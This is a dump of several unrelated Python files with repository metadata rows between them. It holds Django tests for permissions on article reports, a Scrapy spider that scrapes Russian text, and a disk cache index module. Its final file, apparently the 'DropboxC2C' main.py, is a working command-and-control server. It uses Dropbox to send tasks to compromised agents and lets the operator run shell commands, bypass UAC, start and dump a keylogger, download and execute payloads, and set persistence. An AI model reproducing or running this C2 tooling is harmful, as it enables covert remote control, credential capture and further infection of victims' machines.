def test_user_can_retrieve_reports_they_made(self):
"""
Tests that a user can retrieve the reports they have made
"""
self.report_an_article()
self.client.force_authenticate(user=self.user)
response = self.client.get(self.reports_url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_user_cannot_retrieve_reports_they_made_when_unauthenticated(self):
"""
Tests user cannot retrieve reports they made unless they are
authenticated
"""
response = self.client.get(self.reports_url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_admin_can_retrieve_reports_made(self):
"""
Tests admin can retrieve all reports users have made
"""
report = self.report_an_article()
admin = self.create_admin()
self.client.force_authenticate(user=admin)
response = self.client.get(self.reports_url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_user_can_retrieve_a_report_they_made(self):
"""
Tests a user can retrieve a report they made
"""
report = self.report_an_article()
self.client.force_authenticate(user=self.user)
report_url = reverse('articles:report', kwargs={'id': report.id})
response = self.client.get(report_url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data["report"]["reason"], report.reason)
self.assertEqual(response.data["report"]["reporter"]["username"],
self.user.profile.username)
def test_user_cant_retrieve_a_report_they_made_when_unauthenticated(self):
"""
Test user cannot retrieve a report when they are unauthenticated
"""
report = self.report_an_article()
report_url = reverse('articles:report', kwargs={'id': report.id})
response = self.client.get(report_url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_user_cannot_retrieve_a_report_they_didnt_make(self):
"""
Tests a user cannot retrieve a report they didn't make
"""
report = self.report_an_article()
user = self.create_another_user_in_db()
self.client.force_authenticate(user=user)
report_url = reverse('articles:report', kwargs={'id': report.id})
response = self.client.get(report_url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_admin_can_retrieve_a_single_report(self):
"""
Tests admin can retrieve a single report
"""
report = self.report_an_article()
admin = self.create_admin()
self.client.force_authenticate(user=admin)
report_url = reverse('articles:report', kwargs={'id': report.id})
response = self.client.get(report_url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data["report"]["reason"], report.reason)
self.assertEqual(response.data["report"]["reporter"]["username"],
self.user.profile.username)
| 8,139 |
src/Development_Files/Scraping/Spiders/KlassikaSpider.py
|
drummk2/EnglishToRussianTransliteration
| 1 |
2169889
|
# Author: <NAME>
# Date: February 15th 2017
# This script is used to scrape some Russian text from the 'klassika.ru' website.
import scrapy
class KlassikaSpider (scrapy.Spider):
name = 'klassika_spider'
start_urls = ['http://www.klassika.ru/proza/goncharov/oblomov.txt']
def toCyrillic(self, cyrillic_names):
for name in cyrillic_names:
print name.encode('utf-8')
def parse(self, response):
cyrillic_text = response.xpath('//body/text()').extract()
self.toCyrillic(cyrillic_text)
| 529 |
tarn/cache/index.py
|
neuro-ml/tarn
| 0 |
2170208
|
import gzip
import logging
import os
import shutil
import warnings
from itertools import chain
from pathlib import Path
from typing import Any
from ..digest import key_to_relative
from ..local import Storage, DiskBase
from ..interface import Key
from ..utils import create_folders, to_read_only, copy_file, match_files, adjust_permissions
from ..exceptions import StorageCorruption, ReadError
from .serializers import Serializer, SerializerError
from .compat import BadGzipFile
logger = logging.getLogger(__name__)
DATA_FOLDER = 'data'
TEMP_FOLDER = 'temp'
HASH_FILENAME = 'hash.bin'
GZIP_COMPRESSION = 1
class CacheIndex(DiskBase):
def __init__(self, root: Path, storage: Storage, serializer: Serializer):
super().__init__(root)
self.storage = storage
self.serializer = serializer
def _check_value_consistency(self, base: Path, key: Key, value: Any, context):
check_consistency(base / HASH_FILENAME, context, check_existence=True)
def _check_folder_consistency(self, base: Path, key: Key, folder: Path, context):
match_files(base / HASH_FILENAME, folder / HASH_FILENAME)
def _write(self, base: Path, key: Key, value: Any, context: Any):
data_folder, temp_folder = base / DATA_FOLDER, base / TEMP_FOLDER
create_folders(data_folder, self.permissions, self.group)
create_folders(temp_folder, self.permissions, self.group)
self.serializer.save(value, temp_folder)
self._mirror_to_storage(temp_folder, data_folder)
self._save_meta(base, context)
def _replicate(self, base: Path, key: Key, source: Path, context):
# data
destination = base / DATA_FOLDER
shutil.copytree(source / DATA_FOLDER, destination)
for dst in chain([destination], destination.rglob('*')):
adjust_permissions(dst, self.permissions, self.group, read_only=not dst.is_dir())
# meta
copy_file(source / HASH_FILENAME, base / HASH_FILENAME)
to_read_only(base / HASH_FILENAME, self.permissions, self.group)
def _read(self, key, context):
def load(base):
try:
return self.serializer.load(base / DATA_FOLDER, self.storage)
except (SerializerError, ReadError):
raise
except Exception as e:
raise RuntimeError(f'An error occurred while loading the cache for "{key}" at {base}') from e
return self._read_entry(key, context, load)
def replicate_to(self, key, context, store):
self._read_entry(key, context, lambda base: store(key, base))
def _read_entry(self, key, context, reader):
base = self.root / key_to_relative(key, self.levels)
with self.locker.read(key, base):
if not base.exists():
logger.info('Key %s: path not found "%s"', key, base)
return None, False
hash_path = base / HASH_FILENAME
# we either have a valid folder
if hash_path.exists():
check_consistency(hash_path, context)
try:
return reader(base), True
except ReadError as e:
# couldn't find the hash - the cache is corrupted
logger.info('Error while reading %s: %s: %s', key, type(e).__name__, e)
# or it is corrupted, in which case we can remove it
with self.locker.write(key, base):
self._cleanup_corrupted(base, key)
return None, False
# internal
def _save_meta(self, base, pickled):
hash_path = base / HASH_FILENAME
# hash
with gzip.GzipFile(hash_path, 'wb', compresslevel=GZIP_COMPRESSION, mtime=0) as file:
file.write(pickled)
to_read_only(hash_path, self.permissions, self.group)
def _mirror_to_storage(self, source: Path, destination: Path):
for file in source.glob('**/*'):
target = destination / file.relative_to(source)
if file.is_dir():
create_folders(target, self.permissions, self.group)
else:
with open(target, 'w') as fd:
fd.write(self.storage.write(file))
os.remove(file)
to_read_only(target, self.permissions, self.group)
shutil.rmtree(source)
def _cleanup_corrupted(self, folder, digest):
message = f'Corrupted storage at {self.root} for key {digest}. Cleaning up.'
warnings.warn(message, RuntimeWarning)
logger.warning(message)
shutil.rmtree(folder)
def check_consistency(hash_path, pickled, check_existence: bool = False):
suggestion = f'You may want to delete the {hash_path.parent} folder.'
if check_existence and not hash_path.exists():
raise StorageCorruption(f'The pickled graph is missing. {suggestion}')
try:
with gzip.GzipFile(hash_path, 'rb') as file:
dumped = file.read()
if dumped != pickled:
raise StorageCorruption(
f'The dumped and current pickle do not match at {hash_path}: {dumped} {pickled}. {suggestion}'
)
except BadGzipFile:
raise StorageCorruption(f'The hash is corrupted. {suggestion}') from None
| 5,274 |
main.py
|
0x09AL/DropboxC2C
| 161 |
2169795
|
import os
import dropbox
import time
import threading
import cmd
import json
import base64
apiKey = "CHANGE API KEY"
banner = """
$$$$$$$\ $$\ $$$$$$\ $$$$$$\ $$$$$$\
$$ __$$\ $$ | $$ __$$\ $$ __$$\ $$ __$$\
$$ | $$ | $$$$$$\ $$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$\ $$\ $$\ $$ / \__|\__/ $$ |$$ / \__|
$$ | $$ |$$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ \$$\ $$ |$$$$$$\ $$ | $$$$$$ |$$ |
$$ | $$ |$$ | \__|$$ / $$ |$$ / $$ |$$ | $$ |$$ / $$ | \$$$$ / \______|$$ | $$ ____/ $$ |
$$ | $$ |$$ | $$ | $$ |$$ | $$ |$$ | $$ |$$ | $$ | $$ $$< $$ | $$\ $$ | $$ | $$\
$$$$$$$ |$$ | \$$$$$$ |$$$$$$$ |$$$$$$$ |\$$$$$$ |$$ /\$$\ \$$$$$$ |$$$$$$$$\ \$$$$$$ |
\_______/ \__| \______/ $$ ____/ \_______/ \______/ \__/ \__| \______/ \________| \______/
$$ |
$$ |
\__|
"""
# Create a dropbox object
dbx = dropbox.Dropbox(apiKey)
offlineAgents = []
activeAgents = []
completedTasks = {}
interactedAgent = ""
taskLock = False
# This is the agent Checker
def isInsideTimeline(agent):
try:
md, res = dbx.files_download('/%s/lasttime' % agent)
agenttime = float(res.content.strip())
servertime = float(time.time())
if(servertime-60)<=agenttime:
return True
else:
return False
except dropbox.exceptions.HttpError as err:
print('[-] HTTP error ', err)
return False
class TaskChecker(object):
def __init__(self, interval=5):
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
while True:
checkCompletedTasks()
time.sleep(self.interval)
def dropboxFileExists(path,file):
for fileName in dbx.files_list_folder(path).entries:
if fileName.name == file:
return True
return False
def checkCompletedTasks():
for agent in activeAgents:
path = '/%s/output' % agent
try:
if(dropboxFileExists('/%s/' % agent ,'output')):
_, res = dbx.files_download(path)
if(res.content != ""):
outputData = json.loads(res.content.replace('\n',''))
else:
outputData = {}
for data in outputData:
if(data not in completedTasks[agent]):
completedTasks[agent].append(data)
print "\n==== Agent " + agent + " Task: " + data + " ==== "
print base64.b64decode(outputData[data]["OUTPUT"])
taskUpdater(agent)
except Exception, err:
print "[-] Error Receiving Completed Tasks [-]"
print err
pass
def taskUpdater(agent):
tasks = {}
path = '/%s/tasks' % agent
mode = (dropbox.files.WriteMode.overwrite)
try:
_, res = dbx.files_download(path)
if(res.content != ""):
tasks = json.loads(res.content.replace('\n',''))
else:
tasks = {}
for completedTask in completedTasks[agent]:
tasks[completedTask]["STATUS"] = "Completed"
dbx.files_upload(json.dumps(tasks),path,mode)
except Exception, err:
print "[-] Error Updating Tasks [-]"
print err
pass
def sendTask(agent,command):
tasks = {}
path = '/%s/tasks' % agent
mode = (dropbox.files.WriteMode.add)
defaultStatus = "Waiting"
for file in dbx.files_list_folder('/%s/' % agent).entries:
if(file.name == 'tasks'):
mode = (dropbox.files.WriteMode.overwrite)
_, res = dbx.files_download(path)
if(res.content != ""):
tasks = json.loads(res.content.replace('\n',''))
else:
tasks = {}
break
numberOfTasks = 0
for task in tasks:
numberOfTasks += 1
tasks[numberOfTasks+1] = {"STATUS":defaultStatus,"COMMAND":command}
try:
dbx.files_upload(json.dumps(tasks),path,mode)
except Exception:
print "[-] Error Sending Task [-]"
pass
class AgentChecker(object):
def __init__(self, interval=10):
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
# This will list all the folders which are created by the agents.
global activeAgents
while True:
try:
for agent in dbx.files_list_folder('').entries:
agent = agent.name
if(agent not in activeAgents and isInsideTimeline(agent)):
activeAgents.append(agent)
print "[+] Agent " + agent + " is online [+]"
completedTasks[agent] = [] # NEW CODEEEE
elif(agent in activeAgents and not isInsideTimeline(agent)):
activeAgents.remove(agent)
del completedTasks[agent] # NEW CODEEEEE
print "\n[+] Agent " + agent + " is offline [+]"
time.sleep(self.interval)
except Exception:
print "[-] HTTP Error [-]"
time.sleep(30)
pass
def listAgents():
print "\n[+] Listing Agents [+]"
if(len(activeAgents) > 0):
for agent in activeAgents:
print agent
else:
print "[-] No online agents found. [-]"
print "\n"
def changeInteractedAgent(agent):
global interactedAgent
interactedAgent = agent
class Input(cmd.Cmd):
AGENTS = activeAgents
prompt = "C2C#> "
def do_agents(self,s):
listAgents()
def do_interact(self,agent):
self.AGENTS = activeAgents
if(agent in self.AGENTS):
print "[+] Interacting with : " + agent + " [+]"
changeInteractedAgent(agent)
agentInteraction = AgentCMD()
agentInteraction.prompt = self.prompt + "(" + agent + "): "
agentInteraction.cmdloop()
else:
print "[-] Agent not valid [-]"
def complete_interact(self, text, line, begidx, endidx):
if not text:
completions = self.AGENTS[:]
else:
completions = [ f
for f in self.AGENTS
if f.startswith(text)
]
return completions
def do_quit(self,s):
exit(0)
def emptyline(self):
pass
def getInteractedAgent():
global interactedAgent
return interactedAgent
class AgentCMD(cmd.Cmd):
# This is the Agent command line .
def do_sysinfo(self,s):
sendTask(interactedAgent,"{SHELL}systeminfo")
def do_bypassuac(self,s):
sendTask(interactedAgent,"bypassuac")
def do_keylog_start(self,s):
sendTask(interactedAgent,"keylog_start")
def do_keylog_stop(self,s):
sendTask(interactedAgent,"keylog_stop")
def do_keylog_dump(self,s):
sendTask(interactedAgent,"keylog_dump")
def do_exec(self,s):
sendTask(interactedAgent,"{SHELL}%s" % s)
def do_downloadexecute(self,s):
sendTask(interactedAgent,"{DOWNLOAD}%s" % s)
def do_persist(self,s):
sendTask(interactedAgent,"persist")
def do_back(self,s):
interactedAgent = ""
return True
def emptyline(self):
pass
def main():
print banner
agents = AgentChecker()
checker = TaskChecker()
commandInputs = Input().cmdloop()
if __name__ == "__main__":
main()
| 7,074 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.